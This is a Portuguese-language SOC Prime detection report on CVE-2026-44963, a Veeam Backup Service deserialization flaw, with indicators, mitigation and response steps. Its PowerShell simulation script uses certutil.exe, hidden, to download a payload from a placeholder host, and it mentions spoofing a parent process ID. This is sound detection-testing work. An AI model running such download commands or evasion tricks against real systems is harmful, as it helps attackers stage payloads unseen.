SOC Prime Bias: Crítico

10 Jul 2026 18:16 UTC

CVE-2026-44963: Indicadores de Exploração do Serviço de Backup Veeam

Author Photo
SOC Prime Team linkedin icon Seguir
CVE-2026-44963: Indicadores de Exploração do Serviço de Backup Veeam
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Este relatório descreve indicadores de comprometimento associados ao CVE-2026-44963, uma vulnerabilidade no Veeam Backup Service que pode possibilitar a execução remota de código por meio de desserialização insegura. Os atacantes podem explorar a falha para iniciar processos secundários suspeitos a partir do serviço Veeam. A atividade resultante pode levar a acessos não autorizados e criar oportunidades para movimento lateral através da rede.

Investigação

A investigação se concentra em detectar processos secundários suspeitos gerados por Veeam.Backup.Service.exe, incluindo ferramentas como cmd.exe or powershell.exe, e identificar atividades de rede incomuns em portas relacionadas ao Veeam. Os analistas também devem observar eventos de logon não autorizados e alterações inesperadas de arquivos nos diretórios do Veeam.

Mitigação

Para reduzir o risco, os administradores devem atualizar o Veeam Backup & Replication para uma versão que resolva a falha de desserialização insegura. As políticas de firewall devem limitar estritamente o acesso às portas Veeam 9392-9419, e os defensores devem monitorar a autenticação para esses serviços por usuários de domínio que não sejam administrativos. As contas de serviço também devem ser restritas de acordo com os princípios de menor privilégio.

Resposta

Se atividade suspeita for detectada, o servidor Veeam afetado deve ser isolado da rede imediatamente. Os investigadores devem revisar os logs de execução de processos, incluindo o ID do Evento 4688 e a telemetria Sysmon, junto com registros de conexão de rede para determinar a extensão do comprometimento. A atividade recente de contas deve ser auditada, e as credenciais devem ser redefinidas para qualquer conta envolvida durante a janela de intrusão suspeita.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O Check de Pré-voo de Telemetria e Base deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para disparar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos incorretos.

  • Narrativa e Comandos do Ataque: O adversário visa uma vulnerabilidade no Veeam Backup Service (simulado) para obter privilégios de execução. Para manter um perfil discreto ao baixar um payload de segunda fase, o atacante usa o processo do Veeam sequestrado para iniciar certutil.exe, um binário comum de Living-off-the-Land, para buscar um arquivo remoto. Esta ação é destinada a acionar a lógica process_creation da regra de detecção.

  • Script de Teste de Regressão:

    # INÍCIO DA SIMULAÇÃO: Este script simula o serviço Veeam inicializando um processo suspeito.
    # Nota: Como não podemos facilmente 'nos tornar' o serviço Veeam sem direitos de administrador/sistema, 
    # simularemos a telemetria criando um processo fictício que imita o caminho ParentImage.
    
    $VeeamPath = "C:Program FilesVeeamBackup and ReplicationBackupVeeam.Backup.Service.exe"
    $TargetBinary = "certutil.exe"
    
    Write-Host "[+] Simulando processo secundário suspeito de $VeeamPath" -ForegroundColor Cyan
    
    # Em um ambiente real, a vulnerabilidade faria o serviço chamar isso.
    # Para validação, acionamos o processo. Para corresponder estritamente ao requisito 
    # 'ParentImage' da regra Sigma em um laboratório, o testador deve renomear manualmente um processo 
    # ou usar uma ferramenta para falsificar o ID do Processo Pai (PPID) se testando um EDR específico.
    
    Start-Process -FilePath $TargetBinary -ArgumentList "/urlcache /f https://example.com/payload.txt" -WindowStyle Hidden
    
    Write-Host "[+] Comando de simulação executado." -ForegroundColor Green
  • Comandos de Limpeza:

    # Remover quaisquer arquivos temporários criados pela simulação
    Remove-Item -Path "C:pathtosimulatedpayload.txt" -ErrorAction SilentlyContinue
    Stop-Process -Name "certutil" -ErrorAction SilentlyContinue